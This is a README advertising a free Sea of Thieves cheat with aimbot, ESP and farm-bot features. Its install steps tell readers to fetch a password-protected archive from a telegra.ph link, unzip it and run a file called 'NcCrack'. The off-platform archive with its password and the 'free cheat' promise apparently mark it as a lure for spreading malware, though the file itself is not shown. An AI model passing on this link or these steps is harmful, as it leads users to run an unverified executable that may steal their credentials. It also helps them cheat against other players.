# SEA-THIEVES-HACK-AUTOGOLD-ESP-AIMBOT-More

# IMPORTANT 

# Be sure to create an account on GitHub before launching the cheat 
# Without it, the cheat will not be able to contact the server

-----------------------------------------------------------------------------------------------------------------------
# Download Cheat
|[Download](https://telegra.ph/Download-04-16-418)|Password: 2077|
|---|---|
-----------------------------------------------------------------------------------------------------------------------

# Why us?

- We have a website with full player support

- We are constantly updating cheats for the latest version of the game

- We provide all CHEATS for FREE

- Not any problems with the installation 

- All cheats are connected into one launcher for convenience

-----------------------------------------------------------------------------------------------------------------------

# How to install?

- Visit our website

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 2077 )

- Run the file ( NcCrack )

- Launch the game

- In-game INSERT button

-----------------------------------------------------------------------------------------------------------------------

# SYSTEM REQUIREMENTS

- Processor | Intel | Amd Processor |

- Windows support | 7 | 8 | 8.1 | 10 | 11 |

- Build support | ALL |

-----------------------------------------------------------------------------------------------------------------------

# Aimbot

- Aim at Skeletons
- Aim at Players
- Aim at Item's
- Custom Aim key
- Custom Aim Smooth

# Visual

- In Game menu
- Name ESP
- Box ESP
- Health ESP
- Weapon ESP
- Mermaid ESP
- Custom Treasure ESP
- Skeleton ESP
- Custom Ship ESP
- Damage zone ESP
- Ship Water Level ESP
- Steering level
- Showing directions
- Oxygen Level
- Chests, Crate ESP
- Lore ESP
- Skull Cloud ESP
- Pig ESP
- Snake ESP
- Chicken ESP
- Shark ESP
- Megalodon ESP
- Message In A Bottle ESP
- Quest ESP
- Custom ESP Distance Slider.
- Custom ESP Colors .
- Custom ESP Size.

# Misc

- Custom Crosshair.
- Show Ping.
- Bhop.
- Player List.
- Panic key.

# Save

- Save Settings
- Load Settings

# ProFISH mod

- Auto Fish *
- Farm Bot *

![](https://github.com/GioGiKi/ppp/blob/main/sof%20screen%202.png?raw=true)
![](https://github.com/GioGiKi/ppp/blob/main/sof%20screen%203.png?raw=true)
